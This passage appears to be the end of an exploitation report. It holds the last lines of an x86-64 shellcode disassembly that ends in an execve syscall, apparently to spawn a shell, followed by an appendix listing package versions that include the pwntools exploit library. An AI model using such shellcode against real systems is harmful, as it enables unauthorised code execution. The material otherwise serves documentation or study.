4000ee: 57 push rdi

4000ef: 54 push rsp

4000f0: 5f pop rdi

4000f1: 6a 3b push 0x3b

4000f3: 58 pop rax

4000f4: 0f 05 syscall

Appendix D - Requirements.txt

Included here is a `requirements.txt`, which contains the relevant versions and packages used:

Flask==2.3.2

mxnet==1.9.1

mxnet_mkl==1.6.0

pwntools==4.9.0

Requests==2.30.0

This can be installed via:

pip3 install -r requirements.txt
